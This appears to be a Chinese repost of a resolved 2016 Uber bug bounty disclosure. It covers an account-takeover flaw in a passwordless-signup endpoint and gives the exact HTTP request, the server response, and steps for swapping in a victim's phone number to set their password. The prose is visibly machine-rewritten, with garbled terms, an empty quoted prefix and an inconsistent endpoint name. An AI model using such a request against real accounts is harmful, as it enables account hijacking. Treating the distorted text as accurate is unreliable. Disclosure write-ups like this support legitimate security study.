漏洞状态:已解决(已关闭)
发布时间:2016年7月15日凌晨5点38分。
报告的总体目标:优步
漏洞类型:身份验证类
奖金:10,000美元
漏洞概述:
优步是一款全球即时交通移动应用。这款手机软件已经覆盖了中国60多个,全球300多个大都市。优步的重要目的是为您提供更安全舒适的城市交通,改善大城市的城市公共交通。
根据优步移动智能终端中的/rt/users/password-signup,黑客只要掌握整体目标客户的手机号,就可以修改整体目标客户的优步账户的登录密码。然而,事实上,黑客可以继续列举手机号码的类型,直到他们出示申请注册优步帐户的手机号码。
目前,安全系数研究方面的专家教授已经对优步的访客进行了漏洞测试,发现这个漏洞很可能同样适用于优步的司机和单用户游戏角色。
请求/答复:
以下信息取自app客户端的互联网技术请求数据信息(客户具体手机号已被xxxx替代):
POST /rt/users/passwordless-signup HTTP/1.1 Host: cn-geo1.uber.com User-Agent: client/iphone/2.137.1 Connection: close Content-Type: application/json Content-Length: 197 {"phoneNumberE164":"xxxxxxxx","userWorkflow":"PASSWORDLESS_SIGNUP","userRole":"client","mobileCountryISO2":"XX","state":"CREATE_NEW_PASSWORD","newPasswordData":{"newPassword":"12345678911a!"}}符合互联网技术要求的网站服务器回复信息如下:
{"phoneNumberE164":"xxxxxxxx","serverState":"SUCCEEDED","serverStateData":{"nextState":"SIGN_IN"},"tripVerifyStateData":{},"userMessage":"New password has been created. Please login with the new Password.","userRole":"client","userWorkflow":"PASSWORDLESS_SIGNUP"}漏洞应用的全过程:
首先,每个人都必须创建一个新的优步访客帐户。在整个实验过程中,安全系数的研究人员使用了iOS系统软件,但是这个漏洞不会受到系统软件综合服务平台的伤害。
验证成功后,将再次向优步的网站服务器发送上述互联网技术请求,但在推送消息前,必须将“phoneNumberE164”的值更改为关系账户的手机号码(手机号码必须包含我国号码作为前缀,以“”开头)。比如美国手机号的前缀码是1xxx)。在某些情况下,很有可能你必须推送两次互联网技术请求,否则你可能无法接收到服务器发送的回复消息。最后大家很可能会收到内容为“密码已创建”的提示信息,说明大家已经获得了成功升级整体目标账号的账号登录密码。整个目标帐户的密码是请求中“newPassword”字段的值。
这样,每个人都可以在http://riders.uber.com/或其他地方使用密码登录这个帐户。
在此之前,优步一直是黑客们经常选择的攻击目标。早在2014年,优步公司就造成了严重的数据信息泄露。此次事件中,约5万名优步出租车司机的姓名和驾照信息被盗。此外,2016年上半年,优步综合服务平台下的多个账户信息竟然出现在暗网站市场销售中,多条客户信息泄露。因此,优步的专业技术人员应该真正检查他们产品的安全性能。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)